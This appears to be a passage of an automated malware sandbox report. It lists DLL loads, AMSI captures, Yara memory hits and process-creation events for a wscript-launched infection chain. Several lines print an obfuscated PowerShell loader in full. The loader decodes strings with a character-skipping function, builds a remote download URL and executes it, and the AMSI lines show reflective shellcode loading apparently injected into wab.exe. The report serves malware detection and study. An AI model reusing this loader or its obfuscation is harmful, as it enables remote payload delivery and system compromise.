Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: avicap32.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msvfw32.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: CallSite.Targetore.pdbj source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: a`ystem.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1959428838.0000000008919000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBD9F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagement.Automation.pdb source: powershell.exe, 00000002.00000002.2155969999.0000016CBD76C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.Core.pdbD source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRT-P source: powershell.exe, 00000008.00000002.1954692113.0000000007811000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Tryklu", "0")

Source: Yara match	File source: 00000008.00000002.1960677789.000000000A947000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2662796523.0000000005827000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1960362593.0000000008BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1952620099.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Anticipant)$global:Regitzes = [System.Text.Encoding]::ASCII.GetString($Bankkasserer)$global:fyrets=$Regitzes.substring($socialdemokratierne,$glossina)<#Antepirrhema misopfatte Briann
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((opholdsstues $Ejerinder $Teleplasmaens), (Afbanker @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Stripe = [AppDomain]::CurrentDomain.GetAssemblies()$glob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kephalins)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Irremission, $false).DefineType($Ternede, $Phyt
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Anticipant)$global:Regitzes = [System.Text.Encoding]::ASCII.GetString($Bankkasserer)$global:fyrets=$Regitzes.substring($socialdemokratierne,$glossina)<#Antepirrhema misopfatte Briann

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B1D00BD pushad ; iretd		2_2_00007FFB4B1D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B1D0942 push E95B38D0h; ret		2_2_00007FFB4B1D09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B2A71C8 push esp; retf		2_2_00007FFB4B2A71C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04BE8F68 push ss; ret		8_2_04BE8F72
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04BE1CFB pushad ; ret		8_2_04BE1D0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04BE1C6B pushad ; ret		8_2_04BE1CEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04BE7DE0 pushfd ; retf		8_2_04BE7DF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04BE1D0B pushad ; ret		8_2_04BE1D1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_07860638 push eax; mov dword ptr [esp], ecx		8_2_07860AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_07860AB8 push eax; mov dword ptr [esp], ecx		8_2_07860AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_2255A153 push 00000022h; ret		11_2_2255A166
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_2255A170 push 00000022h; ret		11_2_2255A186
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_2255A110 push 00000022h; ret		11_2_2255A126
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_2255A130 push 00000022h; ret		11_2_2255A146
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_24F64CAF push esp; ret		11_2_24F64CC2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_24F62FB0 push es; ret		11_2_24F63B36
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_24F64140 push ds; ret		11_2_24F6424E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_24F62A61 push ds; ret		11_2_24F62A6E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_24F64250 push ds; ret		11_2_24F64536

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
